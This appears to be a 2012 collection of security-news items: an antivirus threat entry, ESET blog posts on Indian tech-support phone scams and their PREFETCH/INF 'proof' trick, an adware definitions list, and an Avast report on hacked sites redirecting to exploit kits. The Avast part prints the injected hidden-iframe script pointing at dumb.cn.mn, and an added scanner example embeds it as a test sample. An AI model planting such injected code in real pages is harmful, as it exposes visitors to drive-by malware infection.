EXP/CVE-2010-0840.HD
VDF version: 7.11.25.96
Published date: Thu, 15 Mar 2012 10:52:26 +0100
Complete description for this threat can be found here.
There's a blog article I've been wanting to write for a few days, but haven't so far been able to make time for. However, Martijn Grooten drew my attention to a blog on much the same topic from our friends at Avast! and one of ESET's partners alerted me to a very relevant and related post by Brian Krebs, so I've pushed it to the top of the stack.
I first became aware of the plague of Indian companies operating PC and anti-virus support scams because one of our competitors advised me that one of them was apparently carrying out unethical marketing on ESET's behalf. (They weren't, of course, anything to do with ESET: see this blog series and this paper.)
I recently learned from my colleagues at ESET UK that cold-callers from Mumbai have developed a new twist on this cold-calling scam, calling people in the UK and apparently claiming to offer paid support in response to problems that don't exist, because, they claim, "ESET doesn't offer free support." (Don't panic! For genuine ESET customer support, there are contact details on the web page for the ESET partner or distributor responsible for the region in which you live.)
It appears from a recent Avast! blog that Avast! customers are suffering a similar experience, 'receiving phone calls from “Avast customer service” reps who need to take control of their computer to resolve some issue and who, for a fee, wish to charge them for this privilege.' Unfortunately, according to Brian Krebs, "users are reporting that the incidents followed experiences with iYogi, the company in India that is handling Avast’s customer support." (The relationship is confirmed by an Avast! blog here.)
While someone describing himself as the co-founder and president of marketing at iYogi has strongly denied any connection with the usual gang of out-and-out scammers, the use, as described by Krebs, of the Event Viewer ploy characteristic of Indian support scams means that iYogi is going to have to work hard to prove its innocence. My guess is that if Avast!, a company with an excellent reputation previously, discovers that iYogi is indeed operating on the side of the non-angels, heads – and outsourcing contracts – will roll.
Support services for anti-virus products obviously vary according to vendor and product. Free one-to-one support may not be available for free products, and other support may range from free but basic, to cattle-class, to business class or de-luxe. However, reputable security companies do have standards that should apply at all points on the spectrum:
Unless, of course, they partner with a support organization that doesn't see the difference between legitimate marketing and outright misrepresentation and fraud. If Avast! has, in fact, fallen into that trap, they have my sincere sympathy. But it will be hard for them to recover from that misstep, and the reputation of the rest of the AV industry has also taken a blow. We can only hope that some good will come out of this, like real progress on effective legal action against support scams.
Paying for third-party support for a free product may sound like a good idea in principle, since AV companies don't normally offer one-to-one support for free products. But it's generally safer to upgrade to a paid version, especially if you already suspect that you have malware on your system. The problem here is that sometimes people don't get AV until they have a problem, and at that point, saving money with a free solution may be a false economy.
Cold-calling (or spamming support forums) to offer paid support for products that already offer free support to paying customers may not sound particularly ethical (well, it doesn't to me). Worse, it may actually cause damage to your system, which may even, depending on the vendor and the actual circumstances, compromise your ability to get the legitimate support you've already paid for. But it isn't necessarily fraudulent, or even illegal, though it may go against privacy legislation covering "Do Not Call" lists, for example; if the Krebs story is correct, though, the existence of a pre-existing support relationship may be used to get round that. And unfortunately, cold-callers from India tend to ignore local do-not-call lists: in fact, some legitimate companies seem to be taking advantage of offshored support to bypass such lists.
But if the call is made on the basis of reports of malware that you don't have, or at some stage the caller tries to persuade you that utilities like INF, PREFETCH, ASSOC and EVENTVWR are proof that you have malware issues, the intent is clearly fraudulent.
Personally, I'd suggest that you regard any unsolicited phone call from a company claiming to offer antivirus support, even for a product you actually have, as a probable scam.
David Harley CITP FBCS CISSP
ESET Senior Research Fellow
Here's a quick summary of the PREFETCH and INF ploys I mentioned in a separate blog here. These are alternatives (or supplements) to the Event Viewer and ASSOC/CLSID ploys that support scammers from India also use to "prove" to a victim that their system is infected with malware or has other security/integrity problems.
The "Prefetch" command shows the contents of C:\Windows\Prefetch, which contains files used in loading programs.

The "INF" command actually shows the contents of a folder normally named C:\Windows\Inf, which contains files used in installing the system.
INF and PREFETCH are legitimate system utilities: so how are they misused by scammers? By asking a victim to press Windows-R to get the Run dialogue box, then asking them to type in something like "prefetch hidden virus" or "inf trojan malware". When a folder listing like those above appears, the victim believes that the system is listing malicious files. In fact, neither of these commands accepts parameters in the Run box. You could type "inf elvish fantasy" or "prefetch me a gin and tonic" and you'd get exactly the same directory listing, showing legitimate files.
Neat trick: but don't you fall for it!
David Harley CITP FBCS CISSP
ESET Senior Research Fellow
Definition file update for Ad-Aware - combating Viruses, Spyware, Malware, Rogue software, Worms and Adware.
Updated definitions:
====================
Win32.Trojan.Agent
Win32.TrojanDownloader.Agent
Win32.TrojanDownloader.ISTBar
Win32.TrojanDownloader.Small
Win32.TrojanPWS.Magania
Win32.TrojanSpy.Zbot
Win32.Backdoor.Small
Win32.Trojan.Inject
Win32.TrojanDownloader.Injecter
Win32.TrojanDownloader.Fraudload
Win32.Worm.AutoIt
Win32.Worm.Runouce
Win32.Backdoor.Gbot
Win32.Trojan.Lebag
Win32.TrojanDownloader.CodecPack
Win32.Trojan.Fraudpack
Win32.Trojan.FakeAV
Win32.Trojan.Zapchast
Win32.Trojan.Genome
Win32.P2PWorm.Palevo
Win32.TrojanSpy.Agent
Win32.TrojanDownloader.Mufanom
Win32.TrojanRansom.Blocker
Win32.Trojan.Swizzor
Win32.Trojan.Vkhost
Win32.Adware.Gamevance
Win32.Trojan.Vbkrypt
Win32.Backdoor.Bredavi
Win32.Adware.ScreenSaver
Win32.Hoax.ArchSMS
Win32.Trojan.Jorik
Win32.Trojan.Diple
Win32.Trojan.Menti
Win32.Worm.Wbna
Win32.TrojanDropper.Dapato
Win32.Trojan.Yakes
Win32.TrojanDropper.Injector
Win32.TrojanRansom.Foreign
Win32.Worm.Ngrbot
Win32.Backdoor.Proxyier
Win32.TrojanDropper.Daws
MD5 checksum: aaw2009-excluded-build-150.756.aawdef: eacfa1b2f30d3dc3c1ca50a9c62f171b
AVG Anti-Virus, a company headquartered not too many kilometers down the road from the AVAST main offices in Prague, promoted an interview with their community manager today on Facebook. Hoping to learn a thing or two, we curiously clicked on the link. To our surprise, avast! blocked it as a malicious URL.
When we attempted to open the URL, it was redirected to dumb.cn.mn, which triggered the blocking action. The only content on dumb.cn.mn is one word: GOTCHA!
Senior virus analyst Jan Sirmer confirmed the attack when we couldn't repeat the block. "The site where the AVG interview was published, smcitizens.com, was hacked for sure, and redirects to a black hole site," he said. "Malicious script on the site is checking visitors' cookies, which is the reason why you don't see the warning more than once."
He went on to explain, "We receive only one word: GOTCHA. It's probably because the attackers are running a database on the dumb site with visiting IP addresses, and if they find this IP, only GOTCHA is returned. I think it helps them to be more secure from malware analysts and users looking into how they have been infected."
After looking into the hack further, Sirmer discovered that the link to dumb.cn.mn, or its variations, was injected into other legitimate sites too. Those links then led to malicious sites containing a black hole exploit kit.
Here is a list of some other dumb sites used as links in hacked legitimate websites:
Sirmer discovered that fckarpaty.in is one of the malicious sites to which users were redirected from the dumb sites. fckarpaty.in hosts a well-known exploit pack called Crimepack. This exploit pack uses a Java vulnerability and silently downloads malicious Java, PDF and Flash files onto users' computers.
In the last four days, Sirmer found that the bad guys had injected a link to one of the dumb sites into 138 unique legitimate sites visited by avast! users. This is not such a huge number, but the attackers focused on sites like smcitizens.com, which has lots of visitors.
An example of injected code:
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    // No body yet: write the hidden 10x10 iframe pointing at the redirector directly
    document.write("<iframe src='http://dumb.cn.mn/in.cgi?2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    // Otherwise build the same invisible iframe and append it to the page body
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://dumb.cn.mn/in.cgi?2');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
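As an added example (not part of the Avast post or its code), the following script scans a page's HTML/JS source for the two forms the injected snippet above takes, a literal hidden iframe tag and an iframe created from script, and reports the redirector URL so a site owner can check their own pages offline. The sample page, the 10-pixel size threshold and the 400-character search window are constructed assumptions for this example.

```javascript
// Added example, not Avast's code: a static scan for the hidden-iframe injection
// pattern shown above, so a site owner can check their own pages for it offline.

// Constructed sample page: a benign embed plus the injected snippet (straight quotes).
const SAMPLE_HTML = `<html><body>
<iframe src="https://www.youtube.com/embed/example" width="560" height="315"></iframe>
<script>
if (document.getElementsByTagName('body')[0]) { iframer(); } else {
  document.write("<iframe src='http://dumb.cn.mn/in.cgi?2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
  var f = document.createElement('iframe');
  f.setAttribute('src', 'http://dumb.cn.mn/in.cgi?2');
  f.style.visibility = 'hidden';
  f.setAttribute('width', '10'); f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);
}
</script></body></html>`;

const IFRAME_TAG = /<iframe\b([^>]*)>/gi;
const ATTR = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
// createElement('iframe') followed (within 400 chars, assumed window) by setAttribute('src', '...')
const DYNAMIC = /createElement\(\s*['"]iframe['"]\s*\)[\s\S]{0,400}?setAttribute\(\s*['"]src['"]\s*,\s*['"]([^'"]+)['"]/gi;

function parseAttrs(raw) {
  const attrs = {};
  for (const m of raw.matchAll(ATTR)) attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  return attrs;
}

// An iframe the visitor cannot see: hidden via CSS or sized down to 10 pixels or less.
function isHidden(attrs) {
  const style = (attrs.style || '').replace(/\s+/g, '').toLowerCase();
  if (/visibility:hidden|display:none/.test(style)) return true;
  const w = parseInt(attrs.width, 10), h = parseInt(attrs.height, 10);
  return (w >= 0 && w <= 10) || (h >= 0 && h <= 10);
}

function findSuspiciousIframes(source) {
  const findings = [];
  for (const m of source.matchAll(IFRAME_TAG)) {
    const attrs = parseAttrs(m[1]);
    if (isHidden(attrs)) findings.push({ src: attrs.src || '', reason: 'hidden-iframe-tag' });
  }
  for (const m of source.matchAll(DYNAMIC)) findings.push({ src: m[1], reason: 'script-created-iframe' });
  return findings;
}

console.log(findSuspiciousIframes(SAMPLE_HTML));
```

Both branches of the injected code are reported with the same redirector URL, while the visible embed is left alone.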
An image of our first visit to smcitizens.com.
And the second visit. Images provided by avast! Virus Lab.
This image has been marked to show the redirection to dumb.cn.mn.
Originally posted at InSecurity Complex

On 14/03/12 At 01:03 PM